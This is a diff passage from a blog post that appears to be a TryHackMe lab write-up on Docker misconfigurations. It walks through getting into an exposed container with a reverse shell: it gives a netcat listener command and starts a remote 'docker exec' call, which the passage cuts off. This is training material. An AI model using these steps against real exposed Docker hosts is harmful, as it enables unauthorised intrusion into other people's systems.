halcyondream/halcyondream.github.io/_posts/2024-09-03-Exploring-Docker-Misconfigurations.md

 Hardcoded secrets are revealed.
 These match the credentials given by the TryHackMe lab.
 However, let's pretend we didn't see those (i.e., that the developer had chosen to manage secrets securely), and continue investigating.

-Without the root user's credentials, we can still enter the container: by using a reverse shell.
+Even without the root user's credentials, we could still enter the container.
+The first way, as noted earlier, is by using `docker exec` to run a shell or shell commands directly.
+Another way is by abusing `docker exec` to launch a reverse shell.

-Start a listener on the host:
+To connect via a reverse shell, start a listener on the host:

 ```
 nc -lvnp 4242
 ```

-Then, leverage the exposed container:
+Then, leverage the exposed container.
+Since the container is Ubuntu, we can use a raw Bash TCP connection.

 ```
 docker -H 10.10.20.228 exec 7b7461f9882e \